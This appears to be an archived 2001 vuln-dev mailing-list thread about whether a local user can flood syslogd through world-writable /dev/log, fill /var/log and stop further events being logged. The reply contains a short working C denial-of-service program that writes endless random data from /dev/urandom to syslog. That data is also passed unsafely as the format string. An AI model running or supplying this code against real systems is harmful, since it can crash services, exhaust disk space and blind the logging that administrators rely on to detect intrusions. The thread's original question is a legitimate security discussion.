Re: Possible syslogd DoS ?

From: VeNoMouS (venomat_private)
Date: Wed Oct 03 2001 - 23:37:20 PDT

  • Next message: Petr Baudis: "Re: Possible syslogd DoS ?"

    well that wouldnt work to well as syslog likes to do "message repeating X
    number of times" , so trying to fill it up would prove boring and pointless.
    
    but yea u could do it simple like this
    
    #include <stdio.h>
    #include <syslog.h>
    
    main()
    {
    FILE *fp;
    char buffer[1024];
    printf("Starting Dos..\n");
    if((fp=fopen("/dev/urandom","r"))==NULL)
        {
        printf("Error Opening /dev/urandom\n");
        exit(0);
        }
    for(;;)
        {
        fgets(buffer,sizeof(buffer),fp);
        buffer[strlen(buffer)-1]='\0';
        syslog(0,buffer,strlen(buffer));
        }
    }
    
    
    something as simple as that works, but for some reason when i run it on my
    box it seems to exit after awhile even tho i capture all signal's maybe
    syslog() has a exit() in the function , i cant be bothered looking into it,
    i did this code on the fly for proof of concept
    ----- Original Message -----
    From: Petr Baudis <paskyat_private>
    To: <vuln-devat_private>
    Sent: Thursday, October 04, 2001 6:09 AM
    Subject: Possible syslogd DoS ?
    
    
    > Hello,
    >   I just recently came on a thought (thanks to Marek Jaros) of possible
    > DoS of syslogd. It uses /dev/log for receiving log messages, which has
    > mode 0666 on most linuxes. It should be ok, as many non-root applications
    > should be allowed to log things etc.
    >   But imagine that you will send a lot of very long messages there,
    different
    > everytime in order not to get stripped into kinda 'message repeated x
    times'.
    > In this way, you can imho flood syslogd successfully, possibly filling
    whole
    > partition where /var/log resides, regardless to your quota settings on
    > the machine!
    >   Then, if /var/log is not on separate partition, the whole system can get
    > into serious problems, and especially, further events won't be obviously
    > logged, so you can do evil things there happily and nobody will know about
    it.
    >   Discussion? Something i didn't take into account? Possible solutions?
    >
    > --
    >
    > Petr "Pasky" Baudis
    >                                                                        .
    >         n = ((n >>  1) & 0x55555555) | ((n <<  1) & 0xaaaaaaaa);
    >         n = ((n >>  2) & 0x33333333) | ((n <<  2) & 0xcccccccc);
    >         n = ((n >>  4) & 0x0f0f0f0f) | ((n <<  4) & 0xf0f0f0f0);
    >         n = ((n >>  8) & 0x00ff00ff) | ((n <<  8) & 0xff00ff00);
    >         n = ((n >> 16) & 0x0000ffff) | ((n << 16) & 0xffff0000);
    >                 -- C code which reverses the bits in a word.
    >                                                                        .
    > My public PGP key is on: http://pasky.ji.cz/~pasky/pubkey.txt
    > -----BEGIN GEEK CODE BLOCK-----
    > Version: 3.12
    > GCS d- s++:++ a--- C+++ UL++++$ P+ L+++ E--- W+ N !o K- w-- !O M-
    > !V PS+ !PE Y+ PGP+>++ t+ 5 X(+) R++ tv- b+ DI(+) D+ G e-> h! r% y?
    > ------END GEEK CODE BLOCK------
    



    This archive was generated by hypermail 2b30 : Thu Oct 04 2001 - 08:29:06 PDT